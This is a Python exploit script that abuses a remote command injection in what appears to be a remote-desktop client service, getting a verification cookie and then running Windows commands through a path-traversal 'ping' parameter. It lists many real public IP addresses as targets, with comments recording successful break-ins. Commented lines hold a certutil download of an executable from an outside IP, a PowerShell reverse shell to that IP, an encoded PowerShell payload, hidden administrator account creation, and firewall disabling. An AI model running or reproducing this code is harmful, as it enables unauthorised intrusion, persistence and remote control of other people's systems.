import requests
import json
import time


def getshell(url,command):
    try:
        dic={}
        dic['url']=url
        print(url)
        vul_url = url + "/cgi-bin/rpc?action=verify-haras"
        reps = json.loads(requests.get(vul_url, verify=False, timeout=5).text)
        verify_string = (reps['verify_string'])
        cookies = {"CID": verify_string}
        print(cookies)
        cs="certutil -urlcache -f http://114.55.59.125:8000/artifact.exe D:\\my.exe"
        # commands=['whoami',cs,'D:\\my.exe']
        commands=['setspn']
        # commands=['whoami','net user','ipconfig /all',"netstat -an ",'systeminfo','tasklist']
        # commands=['whoami','net user','ipconfig /all',]
        # commands=["whoami","net user mike$ @root123 /add","net localgroup administrators mike$ /add","net user mike$"]
        # commands=["whoami","net user jordan$ @root123 /add","net localgroup administrators jordan$ /add","net user jordan$"]
        # commands=['net user test /del']
        # commands=['net time /domain','net config workstation','net user /domain','net group /domain','net group "Domain Computers" /domain']
        # commands=["whoami","net user mike"]
        # commands=['REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber']
        # commands=['REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f','netsh advfirewall set currentprofile state off','netsh advfirewall set privateprofile state off','REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections']
       
        # shell="""powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('114.55.59.125', 3333);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"""
        # shell="powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADMATwBpAFMAaAByACsAbgBQAHcASwBQAGsAeQBWAFcAagBHAE8AbwBtAEkAOABXADYAawA2AEsAcQBLAGkASwBCAEgAUgBhAEUANABxADEAVQBDAEwAWQBIAE4AcgB1AGwARQA4AE8ALwA5ADkARwA5AFIATQBaAGkAZQB6AE8AMQBXADcAVgBsAGwAMAB3ADMAdAA1ACsAbgBrAHYALwBXAHEAUQAzAEcAcwBFAE8AeQBaAFIAQQBnAHQAeQA5ADAAdQBJAFkAeQBmAHcATwBmADcAMgBkAGsAdAA5AGsAMgBUAHIAYgBQAEYAbQBRAC8ASQBXADQAcwBCADgAQQA1AGEARgBZAFIAeAB6AGYAOQAvAGUAcQBBAEEARABqAHkAdAArAFMAUQBCACsAOAB3AEsATABJAGwAagBtADgAawAwAG0AQwBDADIASwBZAGUAbgBtADUAdgBZAG0AZgAwAFgAOQBHAEcAegBoAG0AdwArAEkAawA4AEEAMwBEADUASgBkAFkATQBYAGMASQAxAGQAOAA2AFkAUwBoAEcASABqAEEAOABWAC8ALwArAEsATgBIAE0AWQBZACsATwBlADgAcgBBADAAZwA2AGMAUQB3ADkAQQB6AGsAdwBMAHAAYQA0AGYAMwBLAHIASABjAFQAdwBmAG0AYQA0ADAAQwBUAGMAMwA5AHkAWAB0ADgAbwBBAEIAUQBaAEEARgA3AEcAMABCADgAdwBkAE8AMABYAEgAdAA3AEoAdgBrADgAQQBFADIAUQBrAHEAVwBvAGcAYwBVAGkAegA4ADkAVgBlAGgAOQBIAEoAZgBlADYAMwAwAEkAdwBwAFEAWABDAHgAbwBhAFUAeQBnAFYANwBFAFEASwBwAFMANABiADYAWABNADQAUwBJAE4AWQBiAEcAZwBPAEMAWQBPADQAbQBCAEwASwBpAHYASAByAC8ATQBWAFAAVQBjAC8AegBjAEUAcgBaACsAeQBGADAAdQBWAGsAZABnAGoAWQBPAFgANQA5AHkATQB6AHEAVwBhAGQAWQBZAEUAdQBWAGMAZABNADUAYwAxAGcAbwBjAHkAKwBaAHYANQBmAFgAVgArADcAUABkAHoAUgB6ADYAaABQAEgAZwA1AFcAUgBUAHkAQQBPAFEAZwAzAGkAeABEAEYAaABYAEIAawBDADMAMABKAHcARAByAGQATQByAFIAQwB6AG0AUABsADIAbwBjAFIAQQBZAEUAZwBvADkAcgBrAHIARgBxAGEAWABCAEgAdABZAC8ATwBKAFQAaABNAHIATQA3AHMAdgB2ADIAbgAwAHQAVAB1AEgAaABTAHUANwB2AEsAaABVAC8ASwBqAEUAcABsAGUAQgBTACsAWgBJAFQAdgAwAE8ASABrAHUAZgBOADIAUgB3ADcAegBrAC8AbwBQAHkAUgBYAGkAZgAxACsAUwByAEQAUwA3AGIAZgBQAFUAdABXAEMAQwBOAHEAQQB3AEQAZgBDACsAUAAyAFEAcQA3AGMAMwBOAHkALwA1AEUAcgBMAHoARgBOAFUAZwBkAG4ASwA5AFIANgA1AGEANQBoAFEARwBBAHAAQQBBAHAAMQBrADQARgA1AGoAQwAwAHUAdgAzACsASgB6AGQAWABqAFgAagA4AGkAOABOADEAYQA1AGEARgA1ADEAegBlAE0ANAA0AEgAcgBtAFgAWgBlAEIAWQByADcAYwAzAHAAZAB0AEwAOQBtAFQAdgAzAHcAegBxAEkAQQB2AGkANwBQAHUAdgBxADAARwBFAFcAOABlAEgAWQB1AG8ARAB6AHoARwB2AEMAVgAvADgATABHAFoAdwBpADIARABPAFIAKwBVAHEATgBtAFUANABpADQAWABMAEIAMgBpAEoARgAzAFkASwBHAGEARQB2AFAANgB2ADEAUABZAGUAOAA2ADMAYgBQADQARABvAG0AaQAzAHYATQBVAEwARwBVAEsAUAAwAEkANQBoAHoARABZAG0ASABrAEsAOQBCAGoALwBKADMAMwBMAEUAMgAvAGIARgBtAFoAdwBhAHYAMABwAGIAVABTAHEALwBkAHMAbgArAFYAeQBEADQARQA0AEwAbgBNAHEAWgBYAFYAdQBsAGoAawBOAEEAZwBTAHQATQB0AGYAeABZACsAZgB5AHEAVQBOAEoAawBDADgATAAzACsARQBxAEYAQgBIAEgAQgBEAEcANQBtAG4AcwB0AGYAVQBMAHAAeABYAFUAdgA4AEYAbgBGAFUASgBOAEYAbAA5AEcAdwAwAEUASgBvAE8AZwBCAGwAcgBKAFMANQBvAFcAUABCAGIAcQBvADUAOQBoAFYAQwA0AFYATgBPAGUAZwBBAGgAVgBuAEwATQBVAHMASgBpAHcAdAA1AGsAWABHAGcAawB5AHgAbABzAGwAZgA4ADkAUAAwAG8AVgBEAFoASwBSAEYAeQBMAG8ATQBlAG0AOABDADAAawBJADIASwB6AG4AWABDAG8AcQBUAHoAZABnAFEANgB2AHcASAAyAEIAZgA2ACsAUgBjAEYAQgBsAFgAVgA1AEkAKwBnAEcAWQBKAG8ASwBHAEEAbABMAG0AbABnAHcAbgByAGEANABYAHkAVAA0AG4AMwB2ADgASAA3AHMAYwBYADgAQQBMAE8ASAA0AFMAVwBRAHgAYgB3AFEAUgAxAHYAVwAwAE0AOQBkAGcATABFAFQATwB5AGYAVwBqAEcASABFAFAAWgBTAHkARQBuAHoAcABwAGkAUwByAHAAZAB5AE0AbQBWADAAMwBqACsAOQBFADUANwBSAGkAdwBwAFEAawBIAEgAaABkAEUARQBPAGgAbwBlAFUAOQByAGwAaQBvADgAOQBRACsAdAB0AFcASgBrAEMAcgB1AGkASgBmAFQAdABUADgAOQBtAHYANABTADkAeABOAHAAQQBJAFQAZAA4AFkAbQBuAGcAYgBrAGcATwBCAHIAMgBSAGIAYQBmAG0AMwB3AGMAbwB3AEUASwBqAGQAMABrAEEAcwBlAEoANgB4ADcAYgB2AGUAZQAwAHIAMwBiADQAaQBTAE0ANABUAFcAZABFAEoAOQAyAFQATAB6AG0AbQB4AC8AUwBlAFoAcwBGADYAMwBzAGEAagBaAEMAbwBGAEsARwA2AE4AZQA5AEoASwBCADQANABiADUAYgA2AG8AMQA2AGgAWgBmAFoAQgBPAFQAcQBhAHcAdwB6AE0AZQBCAHUAdgBEAE4AQgBvAGwAYQBzAGQAYQBKAGEAYgBnAGoAUQBOAEoASQBFAHgAMwBTAGYAcwAwAHgASAAwADYAVQA5AGQAMABFAGsAMgA4AGsAZABQAFkASgBlAEsAUwB5AE0AbABvADgARABBAGMAOAAyAHYAdwBnAEkAdwBXAHoAUABXAHQASwBQAE8AMQBqAHUAdwBFAFoAUAB0AFQATwA5AHMANwBVAFEALwBpAHoATQArAGEAcwBRAC8AcgBOAFEARwB1ADUATgBiAGEARAB4ADIANABvAHYAYgBwAE0ASABWAE0ANgB5AFIAQwBYAG0AYgB2AGEAYQBDAFkAWQBWAHkAZgBuAHMAegB0AGYAdQArAEMAcwBLAFoAcgArADkAcAA0AG8AVwArAGUARwBUAGMAMQBFAEcASABKAEUATABDADIARABsAEcAeQA3AE8AagA3AHUAcgByAEIATwBiAFoARQBZAGgAaQBuAEcAVQA3AEgANQBPAFgAVABPAHQAeAB2AHIARwBYAFUAcgA2AHYARwBTAEIAOABpAEgARgBIAFoAOABlAHIAcwB6AE8AbABGAHgAcABOAFQAVABlAHUAeQA1ADMAaABqAGoAYQBPAEgAcABuAFgAaQAwADIASABZAEEAQQBKADIARwBLAGQASAA1AHEAZQBWADgAVwB2AHEAcwBUAHQAYQB6AFgAegB6AFcAWABJADgAYwA4AGUATABjADkAZABzAGUAegBSAHEATQB0AHkATgA0AFYAUQBlAFAAeAA5AHgAUgBHAFEAYwBKAFMAaABxAHoAbABRAHoAdwA1ADMAcgBaAGYASgBQAEQAVABTAHIATQBmAG4ASQBjAEMAZABqAGMARABkAHkARgBCAGUAMABUAC8ARgBrAEQASgBOAHMAbgBhAHIAaQArAEoAaQBPADMATgBFAEQANwBXAFoANgA0AG0ARABYAGgAYwArADYAQwA3AFUAdQA2AFMAZABKAGYAegBWAEoAUgBkAGEAbwBNAEQAeQBaAHEAdABqAHUAVwBrADcAbwBiADMAcgA5AG0AbgA5AEMAYwBNAEQAUABCAE4AOABiAFMAcABzAEgATwBXADYARQBYAHkAZQB1AEsAUABnAEgAeQBZAGgAUAA0AGsARABiADYANABmAE4AVQByADkAcgBOAGcAYgBCAHYAdQAyAHIAdwBDAFMAaQA0AHYAdQAxADUAbABxAGQAdAByAGIATABSAE4AYQA2AHYAUwBtAHYAOQB6AGQAegAwAFoAUAA3ADgAMwAzAHQAZQBmAEEAMABwAFEAcwBKAGoAUgBmAFYAZABrAC8AcwByAHEAZgA5AGcAegBKADUANgBoADkAbgBlAGwAVgArADEAdgBhAFMATwB0AC8AWgBvAHUARgAzAG8ANAAyAHQAQQBIAEcAdQByAEQAdgAxAE8AWQB1AEgAcABTAHkAbABqAG0AZwA4AG0ANgBMADAAVgBOAFUARwBuAFcAbABWADIAMQBlAFgAMAB0AEUAVwBWADAAZgA5AG0AZQAzAHIAdQBoADQATwBNAC8AdABuAG0AdwBFAGQAYQA2AHEAaAB6AFcAeABYAHAARwBHAEEAbABHADIAYgB3AHUAMgBtAFEAKwBVAFkAZwBGAEUAZwBtADkAWgB4ADQANQBwAHEAVgBiAGIAZAB4AHQAYwAyAGEAWAB1AE4AYQBrAE4AYgBwAHYAcABYAE8AdABhAEgAUQB2ADEANABXAGoAMQBOAEIAbABUAGUAdABlAFMAdQBGAGUAMwA0ACsAVAB6AEMAUABOADkAagBTAFUAZQBhAFkAagB4AGYAeABJAGYAZQBLAFYAUQA2AG4AYQAwADUAZgBtAHEAaAA3AGkAaQBvAGsAUQBHADEAZQBVAEYAUgB1ADcAdQBnAHoAZABMAFAAYwBlAHQAcgBOAEcAdwBPAGgAWABrAHIAbQBwADIAaQBnADIARABRAGUAUgA4ADMARABUAGgATQBtACsAbQBXAGgATQBmAHEATABMAG0AYgBXADEASABpAFQAbgBZAFAARwB0AFYANQBXAGoAcwA0AGsAagBpAHQANwBTAGUAdAAxAFoAMAArAEQAUgBLAEsAQgBiAEkAVgBWAHEAUAAyAFEAcABwAHIAcQAxAEMAdgBPADMAZQB0AHAAdwBWADQAbQBvAE4AagBkADcAdAAxADkAVgBUAGQAdAB6AGQARQBVAEQARQBQAFEAcABrAE8AaABMAEYASQAxAHAAdAB4AHIAeQBaAFAAeQBTAHoAVQB1AHUAUABWAHgAagBEAGwANQA4AGIAQQBWAE8ANgBlAHYAOQBvAFAASQBkAHkASQB0AFgANABhADIAWgBvADgANgA0AGcAegByAGUAcQB1AHcALwBvAEMAQgBWAEwAdABuAE4AUABSAGgAdQBVAHEAcQA5AEcAeABNAFQAcABsAHQAVABvAEcANgA3AHgAbQB4AHgAdgBZAHMAQQA1AEgAYwB1AEoAQgBxADMAcwB3AEIAegBRADYAcwBuACsAVgA1AGUAVABkAGkAcwBrAGUATQBwAGsAbwA0AGwAbABlAEsAOABZAHEATwByAEMAOABCAG8ATABvAGQAdwBUAEQAWABUAGEAWABVAHQAUwBiADQAeABIAHQAcwBiAG8AMwBxAHIAQgBPAFcAaQBCAGQAcwA1AHAAUQBYAFAATgBPAG4AQwBUAFQAbABsAG4AdgBqAGoAVABwAFUARgAxAEoAZABuAFUAMQBzAEsAdABhAGYANwA1ADIAQgA5AHYAYQBaAEcAOAAvAFAAdQBhAHQAYwBoAHQAZwBOAHYAMABjAHMANABuAGkASAB4AHgANwAzAGkAUABDAHYAVABjADgAMQB1AFoAWQBlADgAMwBlADMAOQAzAGwATABmAEgAbQAvAGQAUABMAGwAKwBQAHIAZABZAHgAOAAzADkAOABiAFIAMgBhAHUAMwByAHkAOQArAFgAYQBkAEYAeABMAHcAbwBXAHYAKwBhAGoAcABUAEEASQA1ADMAQQBMAEYAdQB5AGkAYQBzADYALwAwAG8AQgBWAGkANgB6AEUAbABxADQARwBRAGEAeABlAEwAbgBvAC8AMABlAFkAaAA4AGkATgB2AGEAeQB3AGYAaAA2AHEAMwBRAFEAQwBzAHgAcwBzAHYAdgBGAGkAUABYAG4AZQA5ADkAbgB0ADYAZgBPAGwAbgBYACsAMAAxAFgAcAArAHcAVgBSAEsAbAAyAHYAUABvAE4AdQB0AC8AbgA0AGMAegBuAGkAZABRAHIAOABmAHAAVgBzADIAUABuAEsASAA0AGkAYwBRAE4AOABtAHUAegBKAFgAUABkAGEAcgAxAFcAcgAyAGIARgBTAFoAdABkADgAbgBwAGgAZQBFAGEAZgBIAGQAWABqAG0AYgAvAHoANQBBACsAZQBnAEsANQBhADcAZQBCAHoAWgBNAGYAUQAvACsASAAyAFAAdwBnADkAZgAvAHoAbQA3AEcAWAB6ADUARABmAG0AYwB2AFIALwBRADUAWgBkAG0AbAAvAEMAKwBZAEgAdQBUAGgANAB3ADAAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA"
        # commands=["whoami",r"dir D:",r"D:\artifact.exe"]
        for command in commands:
            poc11 = url + "/check?cmd=ping../../../../../../windows/system32/" + command
            # poc11 = url + "/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20"+command

            poc_reps = requests.get(poc11, cookies=cookies, timeout=24, verify=False).text
            print(command," : ",poc_reps)
            time.sleep(3)
            dic[command]=poc_reps
        # print(dic)
    except TimeoutError:
        print("timeout")
    except Exception as e:
        print(e)
        print("error")

url="http://31.145.69.19:49673"

# url="http://60.12.3.58:49161"
# url="http://101.74.201.198:49157"   #360
# url='http://103.27.77.56:49672'
# url="http://110.190.77.169:49156"
# url="http://98.102.25.228:49674"
# url="http://125.137.157.175:49674"  #成功  jordan$  韩国的
# url="http://27.36.121.250:49674"   #没有登录的用户
# url="http://137.220.43.65:49157"
# url="http://68.70.255.84:49672"   #成功  jordan$
# url="http://141.223.197.195:49673"   #韩国 浦项工科大学  失败
# url="http://60.16.43.24:49673"  #没有远程服务器授权


# url='http://112.233.10.249:49167/'

# url='http://114.234.45.158:49156'
# url='http://27.36.121.250:49674'
# url='http://222.104.193.156:49672'
# url='http://220.122.216.176:1029'
# url='http://59.49.18.58:49673'
# url='http://220.128.134.86:49672'
# url='http://116.76.15.96:49158'
# url='http://59.48.175.74:49158'
# url='http://123.204.7.254:49158'
# command='ipconfig /all'
command="whoami /all"
# command="net user"
getshell(url,command)